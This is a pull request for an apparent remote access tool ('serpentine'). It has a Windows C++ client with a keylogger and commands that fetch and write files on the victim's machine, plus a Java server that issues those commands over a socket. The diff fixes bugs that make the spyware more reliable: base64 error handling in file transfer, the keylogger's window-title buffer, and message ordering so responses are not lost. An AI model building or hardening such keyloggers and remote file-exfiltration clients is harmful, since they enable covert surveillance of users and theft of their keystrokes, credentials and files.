### PR TITLE
Fixes 2021 05 03

### DIFF
--- a/client/serpentine/controller.cpp
+++ b/client/serpentine/controller.cpp
@@ -69,7 +69,7 @@ void Controller::dispatch(std::string message) {
 	}
 }
 
-void Controller::sendErrorResponse(long long id, std::string message) {
+void Controller::sendErrorResponse(long long id, const std::string& message) {
 	json::json response;
 	response["id"] = id;
 	response["error"] = message;

--- a/client/serpentine/controller.cpp
+++ b/client/serpentine/controller.cpp
@@ -89,7 +89,16 @@ void Controller::getFile(json::json message) {
 	}
 
 	std::string fileString((std::istreambuf_iterator<char>(fileStream)), std::istreambuf_iterator<char>());
-	std::string fileBase64String = base64_encode(fileString);
+	std::string fileBase64String = "";
+	try
+	{
+		fileBase64String = base64_encode(fileString);
+	}
+	catch (const std::exception& e)
+	{
+		sendErrorResponse(message["id"], e.what());
+		return;
+	}
 
 	json::json response;
 	response["id"] = message["id"];
@@ -107,8 +116,16 @@ void Controller::putFile(json::json message) {
 		return;
 	}
 
-	// TODO: Malformed input leads to crash
-	std::string decodedFile = base64_decode(message["file"]);
+	std::string decodedFile = "";
+	try
+	{
+		decodedFile = base64_decode(message["file"]);
+	}
+	catch (const std::exception& e)
+	{
+		sendErrorResponse(message["id"], e.what());
+		return;
+	}
 
 	std::filesystem::path filePath(message["filename"].get<std::string>());
 	std::error_code ec;

--- a/client/serpentine/controller.cpp
+++ b/client/serpentine/controller.cpp
@@ -69,7 +69,7 @@ void Controller::dispatch(std::string message) {
 	}
 }
 
-void Controller::sendErrorResponse(std::string id, std::string message) {
+void Controller::sendErrorResponse(long long id, std::string message) {
 	json::json response;
 	response["id"] = id;
 	response["error"] = message;

--- a/client/serpentine/controller.hpp
+++ b/client/serpentine/controller.hpp
@@ -7,7 +7,7 @@
 class Controller {
 private:
 	Controller();
-	static void sendErrorResponse(long long, std::string error);
+	static void sendErrorResponse(long long, const std::string& error);
 public:
 	static Controller& getInstance();
 	static void dispatch(std::string message);

--- a/client/serpentine/controller.hpp
+++ b/client/serpentine/controller.hpp
@@ -7,7 +7,7 @@
 class Controller {
 private:
 	Controller();
-	static void sendErrorResponse(std::string id, std::string error);
+	static void sendErrorResponse(long long, std::string error);
 public:
 	static Controller& getInstance();
 	static void dispatch(std::string message);

--- a/client/serpentine/keylogger.cpp
+++ b/client/serpentine/keylogger.cpp
@@ -14,8 +14,11 @@ Keylogger& Keylogger::getInstance() {
 
 void Keylogger::registerKey(std::string key) {
 	HWND currentWindowHWND = GetForegroundWindow();
-	char* currentWindowTitle = (char*)malloc(255);
-	GetWindowTextA(currentWindowHWND, currentWindowTitle, 255);
+
+	constexpr unsigned MAX_WINDOW_TITLE_SIZE = 255;
+
+	char* currentWindowTitle = (char*)malloc(MAX_WINDOW_TITLE_SIZE);
+	GetWindowTextA(currentWindowHWND, currentWindowTitle, MAX_WINDOW_TITLE_SIZE);
 	DWORD bytesWritten;
 	SetFilePointer(Keylogger::getInstance().logFile, 0, NULL, FILE_END);
 	if (Keylogger::getInstance().lastWindowTitle == NULL || strcmp(Keylogger::getInstance().lastWindowTitle, currentWindowTitle) != 0) {
@@ -24,8 +27,8 @@ void Keylogger::registerKey(std::string key) {
 		WriteFile(Keylogger::getInstance().logFile, "\n", 1, &bytesWritten, NULL);
 		if (Keylogger::getInstance().lastWindowTitle != NULL)
 			free(Keylogger::getInstance().lastWindowTitle);
-		Keylogger::getInstance().lastWindowTitle = (char*)malloc(100);
-		strcpy_s(Keylogger::getInstance().lastWindowTitle, 100, currentWindowTitle);
+		Keylogger::getInstance().lastWindowTitle = (char*)malloc(MAX_WINDOW_TITLE_SIZE);
+		strncpy_s(Keylogger::getInstance().lastWindowTitle, MAX_WINDOW_TITLE_SIZE, currentWindowTitle, MAX_WINDOW_TITLE_SIZE);
 	}
 	WriteFile(Keylogger::getInstance().logFile, key.c_str(), strlen(key.c_str()), &bytesWritten, NULL);
 	free(currentWindowTitle);

--- a/server/src/main/java/com/github/jafarlihi/controller/FileController.java
+++ b/server/src/main/java/com/github/jafarlihi/controller/FileController.java
@@ -26,13 +26,7 @@ public class FileController {
         request.put("id", requestID);
         request.put("type", RequestType.GET_FILE.getValue());
         request.put("filename", new JSONObject(body).getString("filename"));
-        try {
-            PrintWriter out = new PrintWriter(client.socket.getOutputStream(), true);
-            out.println(request.toString());
-        } catch (IOException ex) {
-            result.setResult(new JSONObject().put("error", "Failed to write to the socket, exception: " + ex).toString());
-            return result;
-        }
+
         Runnable task = () -> {
             client.observable.subscribe((response) -> {
                 JSONObject responseJson = new JSONObject(response);
@@ -44,6 +38,15 @@ public class FileController {
         };
         Thread thread = new Thread(task);
         thread.start();
+
+        try {
+            PrintWriter out = new PrintWriter(client.socket.getOutputStream(), true);
+            out.println(request.toString());
+           } catch (IOException ex) {
+            result.setResult(new JSONObject().put("error", "Failed to write to the socket, exception: " + ex).toString());
+            return result;
+        }
+
         return result;
     }
 


### PR DESCRIPTION
Fixes multiple issues:
 - Incorrect message id type
 - Surround base64 encode/decode with try/catch
 - Assertion triggering when buffer for window title too small in keylogger
 - Wait for client response before sending the message to the client; answer might be sent too fast and gets lost